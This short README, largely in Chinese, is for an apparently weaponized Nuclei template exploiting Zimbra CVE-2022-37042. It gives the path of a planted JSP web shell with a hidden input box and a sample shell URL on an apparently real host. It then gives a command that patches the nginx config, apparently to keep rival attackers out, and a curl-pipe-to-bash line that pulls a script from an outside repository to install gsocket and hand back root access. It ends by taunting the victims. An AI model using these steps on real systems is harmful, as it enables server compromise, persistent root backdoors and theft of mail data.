
Zimbra CVE-2022-37042 Nuclei weaponized template
shell 路径:/public/formatter.jsp
Nuclei 本身:https://github.com/projectdiscovery/nuclei
shell 包含一个透明度为 0 的隐藏输入框,因此只需将鼠标悬停在其上,输入命令,然后按 [Enter] 键:
示例 shell URL:
https://ms1.fission.com:8443/public/formatter.jsp?cmd=id
执行以下命令(仅一次):
cd /opt/zimbra/conf/nginx/templates/; sed -i 's|location ~\* \^/zmerror_|location = /service/extension/backup/mboximport { return 403; }\n location ~\* \^/zmerror_|' nginx.conf.web.http*; /opt/zimbra/bin/zmproxyctl restart;
对于不使用 Nginx 而是 Apache 的服务器,需要额外的代码。欢迎提交 Pull requests。
curl -fskSL raw.githubusercontent.com/aels/zimbra-slapper/main/slapper.sh | bash 2>&1
此命令将安装 global-socket (https://www.gsocket.io/deploy/) 并向你返回用于以 root 身份连接的密钥。
祝你们生日快乐,混蛋们 ;)